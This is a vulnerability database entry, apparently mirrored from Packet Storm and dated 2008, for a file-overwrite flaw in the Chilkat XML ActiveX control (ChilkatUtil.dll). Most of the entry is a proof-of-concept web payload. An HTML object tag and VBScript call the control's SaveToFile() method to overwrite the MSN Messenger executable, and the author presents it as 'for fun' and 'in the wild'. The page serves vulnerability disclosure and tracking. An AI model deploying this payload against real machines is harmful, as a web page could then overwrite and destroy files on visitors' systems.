Lucene search

chilkat-overwrite.txt

🗓️ 27 Sep 2008 00:00:00Reported by e.wiZz!Type

packetstorm🔗 packetstormsecurity.com👁 18 Views

Chilkat XML ActiveX File overwrite vulnerability in ChilkatUtil.dl

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

`Chilkat XML ActiveX File overwriting vulnerability PoC(on msn.exe) for fun  
  
Discovered by: shinnai  
PoC by: e.wiZz!  
  
In the wild...  
  
  
  
File: ChilkatUtil.dll <= 3.0.3.0  
CLSID: {5022FAE8-B780-4B78-B8DC-1AF1145A4F42}  
ProgID: ChilkatUtil.CkData.1  
Descr.: Chilkat CkData  
  
Vulnerable function SaveToFile()  
  
PoC:  
  
<object classid='clsid:5022FAE8-B780-4B78-B8DC-1AF1145A4F42' id='target' />  
<script language='vbscript'>  
  
'Wscript.echo typename(target)  
  
targetFile = "C:\Program Files\Chilkat Software Inc\Chilkat XML ActiveX\ChilkatUtil.dll"  
prototype = "Function SaveToFile ( ByVal filename As String ) As Long"  
memberName = "SaveToFile"  
progid = "CHILKATUTILLib.CkData"  
argCount = 1  
  
arg1="C:\Program Files\MSN Messenger\msnmsgr.exe"  
  
target.SaveToFile arg1   
  
</script>`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

27 Sep 2008 00:00Current

7.4High risk

Vulners AI Score7.4